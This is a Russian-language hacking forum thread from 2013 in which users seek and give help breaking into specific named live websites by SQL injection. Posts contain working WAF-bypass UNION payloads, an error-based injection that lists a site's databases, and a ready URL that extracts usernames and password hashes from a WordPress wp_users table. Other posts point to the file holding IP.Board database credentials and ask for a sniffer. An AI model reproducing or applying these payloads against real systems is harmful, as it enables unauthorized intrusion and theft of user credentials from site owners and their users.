06.05.2013, 02:13
|
|
Участник форума
Регистрация: 11.04.2011
Сообщений: 113
С нами:
7941206
Репутация:
0
|
|
Сообщение от BigBear
читай /etc/httpd/httpd.conf
HTTP/1.0 404 Not Found
Уже смотрел.
Еще вопрос: где хранятся конфиги с коннектом к БД в IP.Board 3.3.4?
|
|
|
06.05.2013, 06:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Ups, в корне посмотрите: "conf_global.php"
|
|
|
|
06.05.2013, 18:25
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Помогите раскрутить инъекцию с обходом WAF.
В общем я добился вывода версии, юзера etc, но не могу получить имя БД, таблицы, ну и соответветственно содержимое таблиц.
Фильтрую в /*! */ всё подряд, но 406 ошибка.
Заранее спасибо.
Код:
http://www.lopusina.com/knjiga.html?id=36 /*!union*/(select all 1,/*!version()*/,3,4,5,6,7,8,9,10,11,12)--+
Вывод в 238 строчке исходника. |
|
|
|
08.05.2013, 14:36
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Сообщение от None
www.dnrltd.com/job_details.php?id=-64 /*!union*/ (/*!select*/ all 1,2,3,4,5,6,7,8,9,10,11,12,/*!group_concat(column_name)*/,14,15,16 from /*!InForMatioN_SchEma*/.tables where /*!table_name*/ like 0x77705f7573657273 )--+
Помогите прочитать таблицу wp_users
|
|
|
|
08.05.2013, 15:07
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от MaxFast
Помогите прочитать таблицу wp_users
http://www.dnrltd.com/job_details.php?id=-64%20/*!union*/%20%28/*!select*/%20all%201,2,3,4,5,6,7,8,9,10,11,12,/*!concat_ws%280x3a,user_login,user_pass%29*/,14,15,16%20from%20wp_users+limit+1,1%20%29--+
|
|
|
|
08.05.2013, 23:20
|
|
Познающий
Регистрация: 03.03.2013
Сообщений: 46
С нами:
6944726
Репутация:
0
|
|
Код:
http://pfl.ua/articles/?art=1275511872
Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5. |
|
|
|
08.05.2013, 23:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от rogatiy
Код:
http://pfl.ua/articles/?art=1275511872
Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5. Фильтруется union и скобки.
|
|
|
|
09.05.2013, 01:46
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от rogatiy
Код:
http://pfl.ua/articles/?art=1275511872
Error-Based SQL-inj, ни руками, ни морковкой не получается вывести кол-во полей, хотя MySQL вроде 5. Посредством POST запроса все проходит на ура:
http://pfl.ua/articles/?art=1275511872+or+1+group+by+concat((select+user( )),floor(rand(0)*2))+having+min(0)--+
DATA:
USERflcom_db@localhost
DBflcom_db
DB LIST:
pflcom_db
information_schema
mafpfl
pfl_db
pfl_forum
pflcom_db
|
|
|
|
09.05.2013, 15:01
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Посоветуйте хороший снифер,можна платный.
|
|
|
|
09.05.2013, 15:07
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Sat-hacker
Посоветуйте хороший снифер,можна платный.
снифер чего?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
